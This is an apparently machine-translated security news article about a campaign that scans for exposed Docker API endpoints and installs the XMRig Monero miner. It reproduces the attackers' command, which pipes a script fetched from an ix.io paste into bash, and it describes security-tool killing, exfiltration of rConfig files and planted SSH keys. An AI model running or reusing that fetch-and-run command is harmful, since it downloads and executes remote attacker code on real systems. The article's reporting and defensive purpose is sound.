Tuesday, November 24, 13:40
Home security Hackers install cryprominer on Docker platforms with exposed API endpoints

Hackers install cryprominer on Docker platforms with exposed API endpoints

Docker platformsResearchers have found that a hacking team scans it en masse Internet looking for Docker platforms that have API endpoints exposed online.

Hackers make scans in order to develop one cryptominer on exposed Docker platforms and steal money.

Professionals behind her hacking campaign

According to researchers, the mass scanning campaign launched on the weekend of November 24. It immediately caught the researchers' attention because of its vast area.

Troy Mursch, lead researcher and co-founder of Bad Packets LLC, said that exploiting exposed Docker platforms is nothing new. It happens often.

"It simply came to our notice then wide scan range. This in itself required further research to find out where this was targeted botnet"He said.

What information do we have so far?

For now, researchers have discovered that the hacking team, responsible for this campaign, has already scanned more than 59.000 IP networks (netblocks) looking for exposed Docker platforms.

If a vulnerable machine is detected, the hackers use the endpoint API to start one Alpine Linux OS container, where they execute the following command:

chroot / mnt / bin / sh -c 'curl-sL4 http://ix.io/1XQa | bash;

This command downloads and executes one Bash script from the intruder server. This script then installs one crypotminer XMRRig. According to Mursch, during the weekend, hackers stole 14,82 coins Monero (XMR), worth just 740 dollars.

Another thing that researchers have noticed is that malicious software that the hackers install, has one self-defense measure.

"One unique but interesting function of this campaign is that it does uninstall known monitoring programs and "kill" various processes, "through a script coming down from http: // ix [.] Io / 1XQh," Mursch said.

This script disables products security, and processes related to cryptomining botnet rivals, such as DDG.

In addition, Mursch discovered that the malicious script has another function, which scans the infected computer by searching rConfig configuration files. The script encrypts and steals them archives and sends them to the attackers' command and control server.

Craig H. Rowland, founder of Sandfly Security, also noted that hackers create backdoor accounts in hacked containers and leave behind SSH keys to make them easier access and be able to remotely control all infected bots.

At present, Mursch proposes to all of them users and companies running Docker platforms to check if there are exposed API endpoints on the Internet and to act immediately.


Please enter your comment!
Please enter your name here

Absent Mia
Absent Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greatest achievement


Data breach at Bristol City Council

A data breach that took place in the Bristol City Council, resulted in the leak of information such as names and email addresses ...

E-Land-South Korea: Fell ransomware attack

One of the largest retailers in South Korea, E-Land, was forced to close almost half of its stores after a ransomware ...

Investigator breaks down a Tesla Model X in just minutes

A Belgian security researcher has discovered a method that hijacks the firmware of key fobs of the Tesla Model X, allowing him to ...

Arrest of fraudsters for a scam associated with the sale of an airplane!

U.S. police have arrested a man in connection with a multimillion-dollar scam involving the sale of an airplane to Australia. In 2018, research began after ...

Black Friday offers: Windows 10 completely FREE!

Black Friday offers: Windows 10 completely FREE! Black Friday is a huge promotional event created by big retailers ...

TikTok fixes bugs that allowed account breaches

TikTok has encountered two vulnerabilities that could allow intruders to take over accounts with a single click when connected together ...

Parliament Street: UK MPs receive millions of email attacks every month

UK MPs have been repeatedly targeted by hackers, with email attacks receiving a 60% increase from year to year ...

Louisiana hospitals have reported data breaches

Thousands of Louisiana patients have fallen victim to a cyber attack that has hit US medical facilities. LSU Health New Orleans published ...

Fake Minecraft modpacks bombard devices with ads

Hackers managed to bypass the protections of the Google Play Store and publish more than 20 fake modpacks for the popular game ...

Brazil Supreme Court: Recovers after ransomware attack

After suffering the most serious cyber attack ever orchestrated against a Brazilian public sector institution, the Supreme Electoral Court (STJ) ...